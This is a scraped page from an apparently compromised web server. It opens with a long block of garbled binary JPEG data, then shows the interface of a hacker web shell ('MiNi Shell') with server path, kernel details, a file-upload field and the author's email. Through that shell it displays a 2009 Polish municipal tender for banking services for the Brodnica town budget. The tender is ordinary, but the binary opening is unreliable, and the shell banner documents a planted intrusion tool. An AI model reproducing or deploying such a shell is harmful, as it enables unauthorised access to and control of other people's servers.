JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090129/11896-N-2009.html

<p class="kh_header"><b>Brodnica: Wykonywanie bankowej obsługi budżetu Gminy Miasta Brodnica w latach 2009-2014</b><br>
<b>Numer ogłoszenia: 11896 - 2009; data zamieszczenia: 29.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Brodnicy , ul. Kamionka 23, 87-300 Brodnica, woj. kujawsko-pomorskie, tel. 056 4930300, faks 056 4982626.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brodnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie bankowej obsługi budżetu Gminy Miasta Brodnica w latach 2009-2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest wykonywanie bankowej obsługi budżetu Gminy Miasta Brodnica w latach 2009-2014.
Przedmiotem zamówienia jest wybór banku wykonującego bankową obsługę budżetu Gminy Miasta Brodnica przez okres 60 miesięcy od daty podpisania umowy.
2. Szczegółowy zakres zamówienia:
1) prowadzenie rachunków bankowych, a w szczególności:
- otwarcie i prowadzenie rachunków bieżących oraz rachunków pomocniczych,
(łącznie do 50 rachunków),
- realizacja poleceń przelewu,
- przyjmowanie wpłat gotówkowych,
- dokonywanie wypłat gotówkowych,
- potwierdzanie stanu salda na każdy dzień roboczy (sporządzanie wyciągów w
ilości wg potrzeb zamawiającego),
dla Urzędu Miejskiego w Brodnicy oraz niżej wymienionych jednostek:
a/ Szkoła Podstawowa Nr 1, ul. 3 Maja 2 w Brodnicy,
b/ Szkoła Podstawowa Nr 2, ul. Kolejowa 62 w Brodnicy,
c/ Szkoła Podstawowa Nr 4, ul. Nowa 34 w Brodnicy,
d/ Gimnazjum Nr 1, ul. Wiejska 6 w Brodnicy,
e/ Zespół Szkół Nr 1, ul. Matejki 5 w Brodnicy,
f/ Miejski Ośrodek Pomocy Społecznej, ul. Ustronie 2b w Brodnicy,
g/ Poradnia Rodzinna, ul. św. Jakuba 22 w Brodnicy,
h/ Ośrodek Sportu i Rekreacji, ul. Królowej Jadwigi 1 w Brodnicy,
i/ Przedszkole Publiczne Nr 6, ul. Batalionów Chłopskich 28 w Brodnicy,
j/ Przedszkole Publiczne Nr 8, ul. Zielona 3 w Brodnicy,
k/ Przedszkole Publiczne Nr 9, ul. Wyspiańskiego 12A w Brodnicy,
Zamawiający zastrzega możliwość zmian w wyszczególnionym aktualnym wykazie jednostek. W takim przypadku Wykonawca zobowiązuje się w okresie trwania umowy do objęcia obsługą bankową na zasadach wynikających z warunków zamówienia również inne jednostki organizacyjne z uwzględnieniem ograniczenia obsługi do maksymalnej liczby 50 rachunków bankowych.
2) możliwość umieszczania wolnych środków pieniężnych na lokatach terminowych (w tym również typu overnight).
Oprocentowanie środków pieniężnych umieszczanych na lokatach krótkoterminowych (w tym również overnight) oparte na stawce WIBID (T/N i 1M), pomniejszonej o marżę banku w wysokości .......... %,
3) automatyczne lokowanie środków pieniężnych pozostających na koniec dnia na rachunkach bankowych na rachunki typu overnight, o ile ich wysokość stanowić będzie kwotę co najmniej 50.000 zł,
4) możliwość zaciągania kredytu w rachunku bieżącym do limitu określanego corocznie uchwałami Rady Miejskiej w Brodnicy (limit ustalony na rok 2009 wynosi 2,5 mln zł). Oprocentowanie kredytów w rachunku bieżącym oparte na stawce WIBOR 1M, powiększonej o marżę banku w wysokości .......... %,
5) prowadzenie usług bankowości elektronicznej umożliwiającej dokonywanie operacji drogą elektroniczną oraz uzyskiwanie informacji o stanie rachunku bankowego,
6) prowadzenie usługi typu teleserwis (informacja telefoniczna o stanie rachunku bankowego),
7) prowadzenie doradztwa finansowego i wydawania opinii z zakresu:
- pozyskiwania środków bezzwrotnych pochodzących z funduszy Unii Europejskiej,
- pozyskiwania kredytów preferencyjnych,
- lokowania wolnych środków.
8) obsługa upoważnionych pracowników Zamawiającego i jednostek podległych w placówce Wykonawcy poza kolejnością - w zakresie załatwiania spraw związanych z obsługą bankową w dni robocze w godz. od 8.00 do 16.00.
3. Zamawiający zastrzega sobie swobodę lokowania wolnych środków w innych bankach, zgodnie z art. 195 ust. 2 ustawy z dnia 30 czerwca 2005 r. o finansach publicznych (Dz.U. z 2005 r. Nr 249, poz. 2104).
4. W celu wstępnego zbadania kondycji finansowej Zamawiającego, wykonawcy mogą się zapoznać z wykonaniem budżetu za 3 kwartały 2008 roku oraz budżetem na 2009 rok w siedzibie Urzędu Miejskiego w Brodnicy, pokój nr 103, w dni robocze, w godzinach od 8.00 do 16.00.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.10.00.00-1, 66.11.00.00-4, 66.11.20.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych 
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.(art. 24 ust. 1 i ust. 2 ustawy P.z.p.).
2. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o dokumenty i oświadczenia wymienione w pkt X SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że Wykonawca spełnia w/w warunki. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.
3. Z ubiegania się o udzielenie zamówienia publicznego wyklucza  się:
a.	Wykonawców, którzy nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 ustawy - Prawo zamówień publicznych.
b.	Wykonawców, którzy wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; z wyjątkiem autorów miejscowych planów zagospodarowania przestrzennego, jeżeli przedmiotem postępowania o udzielenie zamówienia są prace projektowe wynikające z miejscowych planów zagospodarowania przestrzennego, sporządzonych przez tych autorów.
c.	Wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania.
d.	Wykonawców, którzy nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków.
e.	Wykonawców, którzy nie zgodzili się na przedłużenie okresu związania ofertą.
4. Mogą się ubiegać Wykonawcy, którzy spełniają następujące warunki szczegółowe:
- posiadają uprawnienia do wykonywania działalności - obsługi bankowej - zgodnie z ustawą z dnia 29 sierpnia 1997 r. - Prawo bankowe (tekst jednolity Dz.U. z 2002 r. Nr 72, poz. 665 z późn. zm.),
- wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną usługę, odpowiadającą swoim zakresem
i wartością usługom stanowiącym przedmiot zamówienia, polegającą na wykonaniu obsługi budżetu jednostki samorządu terytorialnego lub jednostki administracji rządowej,
- którzy posiadają swoją placówkę (oddział, filię) na terenie miasta Brodnica, która w pełni zabezpieczy kompleksową obsługę w zakresie określonym w p. III.1 - w przypadku braku placówki (oddziału, filii) zobowiązują się w terminie 14-stu dni od daty podpisania umowy do uruchomienia własnej placówki na terenie miasta Brodnica,
- którzy umożliwią korzystanie przez Gminę ze środków wpływających na rachunki bankowe w czasie rzeczywistym, w tym samym dniu, bez dodatkowych opłat, oraz, którzy nie będą pobierali:
- opłat i prowizji bankowych od wpłat gotówkowych dokonywanych na rzecz Gminy przez płatników podatków i opłat lokalnych oraz innych należności budżetowych, a także od wpłat własnych,
- innych niż określone w formularzu ofertowym, prowizji ani opłat z tytułu otwarcia i prowadzenia rachunków bankowych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz oświadczenia i dokumenty wymagane dla ważności oferty, oferta powinna zawierać:
1.	Formularz ofertowy - wg załącznika Nr 1 do SIWZ.
2.	Oświadczenie w trybie art. 22 ust.1 od pkt 1 do pkt 4, art. 24 ust. 1 pkt 1-9 oraz art. 24 ust. 2 pkt 1 na podstawie ustawy  z dnia 29 stycznia 2004r z poźn. zmianami - Prawo zamówień publicznych - wg załącznika Nr 2 do SIWZ.
3.	Oświadczenie o akceptowaniu warunków określonych w SIWZ i nie zgłaszaniu zastrzeżeń, co do przedmiotu zamówienia - wg załącznika Nr 3 do SIWZ.
4.	Informacje ogólne o wykonawcy - wg załącznika Nr 4 do SIWZ.
5.	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykonawca musi wykazać, że wykonał (zakończył) [chyba, że świadczenie okresowe lub ciągłe] co najmniej 1 (jedną) usługę z należytą starannością o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj., w zakresie wykonywania bankowej obsługi budżetu. Należy podać ich wartość, przedmiot, datę wykonania i odbiorców oraz załączyć referencje zleceniodawców lub dokumenty potwierdzające, że te usługi zostały wykonane należycie tj. z należytą starannością, w treści których m.in. wymieniony jest zakres i rodzaj usług zrealizowanych przez Wykonawcę - wg załącznika Nr 5 do SIWZ.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek określony w pkt X. ppkt 6.

6.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
8. Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym (zezwolenie Prezesa NBP na wykonywanie czynności bankowych),

            Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 roku w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane.
	  Mianowicie, zamiast dokumentów wymienionych w pkt X. ppkt 6, 7 SIWZ, Wykonawca składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a.)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b.)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości decyzji właściwego organu,
c.)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty wymienione powyżej powinny być wystawione w terminach analogicznych do odpowiadających im dokumentów wymienionych w pkt X. ppkt 6, 7 SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 50</li>
<li>2 - Oprocentowanie środków na rachunkach - 15</li>
<li>3 - Oprocentowanie lokat typu overnight - 20</li>
<li>4 - Oprocetowanie kredytu w rachunku bieżącym - 10</li>
<li>5 - Możliwość przeprowadzania wypłat gotówkowych (świadczenia rodzinne i społeczne) za pomocą kart płatniczych przedpłatowych - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.brodnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pok. 308.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2009 godzina 11:00, miejsce: Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pok. 211 lub drogą pocztową na adres siedziby zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com